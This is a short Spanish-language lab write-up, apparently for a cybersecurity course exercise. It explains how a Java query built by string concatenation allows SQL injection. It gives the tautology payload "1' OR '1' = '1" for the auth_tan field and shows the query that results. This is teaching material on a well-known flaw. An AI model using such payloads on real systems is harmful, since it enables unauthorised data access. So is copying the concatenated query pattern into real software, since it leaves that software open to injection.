# Introducción a la Ciberseguridad - Vulnerabilidad A1 SQL Injection (Apartado 11)

Conociendo que la aplicación construye una query dinámica concatenando una variable de tipo string de la siguiente manera:

```java
String sql = "SELECT * FROM employees WHERE last_name = '" + name + "' AND auth_tan = '" + auth_tan + "'";
```

Se puede explotar la vulnerabilidad pasando en el segundo parámetro del formulario el texto "1' OR '1' = '1" para que la consulta resultante sea la siguiente:

```sql
SELECT * FROM employees WHERE last_name = 'ure' AND auth_tan = '1' OR '1' = '1';
```

![SQL Injection](./img/01-a1_sqli_11.gif)
